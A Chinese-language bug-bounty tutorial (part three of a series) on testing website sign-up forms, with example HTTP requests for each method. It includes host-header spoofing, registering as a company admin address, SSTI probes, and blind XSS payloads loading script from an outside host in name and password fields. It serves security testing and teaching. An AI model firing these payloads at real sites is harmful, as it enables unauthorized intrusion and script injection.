赏金猎人系列-如何测试注册(Sign up)功能(III)以及相关Tips
赏金猎人系列-如何测试注册(Sign up)功能(III)以及相关Tips
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
正文
本文为本系列的第三篇,继续梳理注册功能中可能存在漏洞的测试流程与方法,前面写的系列文章有:
赏金猎人系列-如何测试注册(Sign up)功能以及相关Tips
第十五种方法
尝试用公司邮箱地址来注册,例如admin@company.com,然后尝试访问公司的所有接口,而无需验证admin@company.com
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
firstname=I&lastname=am&email=admin@company.com&pas sword=*****&captcha=Random&token=CSRF
第十六种方法
如果admin@company.com作为电子邮件地址通过了,但是不能激活,可以尝试欺骗主机头,例如x-forward-Host或X-Host
POST /signUp HTTP/1.1
Host: www.company.com
X-Forwarded-Host: me.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number
firstname=I&lastname=am&email=admin@gmail.com&password= ********&captcha=Random&token=CSRF
第十七种方法
尝试在用户名中插入SSTI的payload,比如: {{7*7}} , {7*7}或者${7*7}
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
firstname={{7*7}}&lastname={{7*7}}&username={{7*7}} &email=me&password=*****&captcha=Random&token=CSRF
第十八种方法
尝试在用户名中插入<%,如果在邮件正文中发现<%起到作用,尝试注入<%= 7 * 7 %>看看有没ssti漏洞
第十九种方法
尝试在名字中注入盲xss的payload: "><script src=//me.xss.ht></script>,查看一下有没有Blind xss
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number
firstname="><script src=//me.xss.ht></script>
&lastname="><script src=//me.xss.ht></script>&
email=me@gmail.com&password=**************&captcha=Random &token=CSRF
第二十种方法
尝试在名字中注入盲xss的payload: <img src="//me.xss.ht">,查看一下有无Blind xss
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: Number
firstname=<img src="//me.xss.ht">
&lastname=<img src="//me.xss.ht">&
email=me@gmail.com&password=**************&captcha=Random &token=CSRF
第二十一种方法
在设置密码时尝试注入盲xss的payload:"><script src=//me.xss.ht></script>
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number
firstname=I&lastname=am&email=me&password="><script src=//me.xss.ht></script>&captcha=Random&token=CSRF
参考
https://rohitcoder.medium.com/facebook-workplace-bug-exposed-offsite-employee-events-sensitive-emails-putting-employees-at-risk-813d77a0c0ab
https://gauravnarwani.com/injecting-6200-to-1200/
https://verneet.com/fuzzing-77-till-p1/
https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html
https://hackerone.com/reports/423541
https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870
https://hackerone.com/reports/251224
https://twitter.com/intigriti/status/1072181482028978177
https://hackerone.com/reports/7995